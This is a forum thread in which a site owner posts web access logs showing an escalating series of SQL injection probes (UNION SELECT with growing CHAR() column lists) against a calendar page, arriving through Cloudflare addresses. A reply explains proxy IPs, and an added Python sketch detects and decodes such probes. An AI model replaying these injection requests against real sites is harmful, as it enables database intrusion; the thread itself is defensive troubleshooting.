Cloudflare hacking?

It seems like Cloudflare is repeatedly calling a webpage on our site (btcnj.com) with “nonsense” data. The data is SQL commands and they keep getting bigger. It looks like an injection attack.

What is going on?

This is what the access logs look like for this:

162.158.88.50 - - [21/Mar/2020:10:14:15 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45)%20–%20 HTTP/1.0” 200 4733 “-” “-”
162.158.94.80 - - [21/Mar/2020:10:14:15 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45)%20–%20 HTTP/1.0” 200 4740 “-” “-”
162.158.90.254 - - [21/Mar/2020:10:14:15 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45)%20–%20 HTTP/1.0” 200 4743 “-” “-”
162.158.91.65 - - [21/Mar/2020:10:14:16 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45)%20–%20 HTTP/1.0” 200 4747 “-” “-”
162.158.88.188 - - [21/Mar/2020:10:14:16 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45)%20–%20 HTTP/1.0” 200 4750 “-” “-”
162.158.94.124 - - [21/Mar/2020:10:14:16 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45)%20–%20 HTTP/1.0” 200 4753 “-” “-”
162.158.91.41 - - [21/Mar/2020:10:14:17 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45)%20–%20 HTTP/1.0” 200 4756 “-” “-”
162.158.90.254 - - [21/Mar/2020:10:14:17 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45)%20–%20 HTTP/1.0” 200 4759 “-” “-”
162.158.91.213 - - [21/Mar/2020:10:14:18 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45)%20–%20 HTTP/1.0” 200 4763 “-” “-”
162.158.91.213 - - [21/Mar/2020:10:14:18 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45)%20–%20 HTTP/1.0” 200 4768 “-” “-”
162.158.90.156 - - [21/Mar/2020:10:14:18 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45)%20–%20 HTTP/1.0” 200 4770 “-” “-”
162.158.94.124 - - [21/Mar/2020:10:14:19 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45)%20–%20 HTTP/1.0” 200 4774 “-” “-”
162.158.88.50 - - [21/Mar/2020:10:14:19 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45)%20–%20 HTTP/1.0” 200 4778 “-” “-”
162.158.89.133 - - [21/Mar/2020:10:14:20 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45)%20–%20 HTTP/1.0” 200 4783 “-” “-”
162.158.94.80 - - [21/Mar/2020:10:14:21 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45)%20–%20 HTTP/1.0” 200 4787 “-” “-”

You are not rewriting IP addresses -> https://support.cloudflare.com/hc/en-us/sections/200805497-Restoring-Visitor-IPs

2 Likes
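What the reply above points at, as an added example (not code from the thread): the 162.158.x.x addresses belong to Cloudflare's edge, so the log records the proxy rather than the visitor sending the probes. This sketch parses lines in the thread's log format, flags clients inside Cloudflare's published 162.158.0.0/15 range, and decodes the CHAR() markers. The sample lines, the function names and the single-range list are assumptions made for the example.

```python
import ipaddress
import re
from urllib.parse import unquote

# Assumption: a single Cloudflare edge range, enough to cover the 162.158.x.x
# addresses in the thread. In practice load Cloudflare's full published list.
CLOUDFLARE_NETS = [ipaddress.ip_network("162.158.0.0/15")]

# addr, ident, user, [timestamp], opening quote (straight or curly), method, target
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] ["“](\S+) (\S+)')
CHAR_RE = re.compile(r'CHAR\(([\d,]+)\)', re.I)
UNION_RE = re.compile(r'\bUNION\s+SELECT\b', re.I)

def is_cloudflare(addr):
    """True if the logged client address is a Cloudflare edge, not a visitor."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:          # hostname or malformed field
        return False
    return any(ip in net for net in CLOUDFLARE_NETS)

def analyse(line):
    """Return a dict describing one access-log line, or None if unparsable."""
    m = LINE_RE.match(line)
    if not m:
        return None
    addr, _ts, _method, target = m.groups()
    query = unquote(target.partition("?")[2])
    # Each CHAR(...) call is one probed column; decode it to its marker text.
    markers = ["".join(chr(int(n)) for n in args.split(","))
               for args in CHAR_RE.findall(query)]
    return {
        "remote_addr": addr,
        "via_cloudflare": is_cloudflare(addr),
        "union_select": bool(UNION_RE.search(query)),
        "columns": len(markers),
        "markers": markers,
    }

# Constructed sample lines modelled on the log in the question (quotes
# normalised); the last one is a benign request from a documentation address.
SAMPLE = [
    '162.158.88.50 - - [21/Mar/2020:10:14:15 -0400] "GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45)%20--%20 HTTP/1.0" 200 4733 "-" "-"',
    '162.158.94.80 - - [21/Mar/2020:10:14:15 -0400] "GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45)%20--%20 HTTP/1.0" 200 4740 "-" "-"',
    '203.0.113.7 - - [21/Mar/2020:10:15:02 -0400] "GET /pages/calendarShowDetail.php?calid=4901 HTTP/1.0" 200 4701 "-" "-"',
]

if __name__ == "__main__":
    for entry in SAMPLE:
        print(analyse(entry))
```

A rising `columns` value across consecutive requests is the signature of the pattern in the question; once visitor IPs are restored, `remote_addr` shows who is sending it.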

Thanks.

Some of the IP addresses in the log are already not Cloudflare’s.

I’m not sure if my hosting company is going to let me install that package.
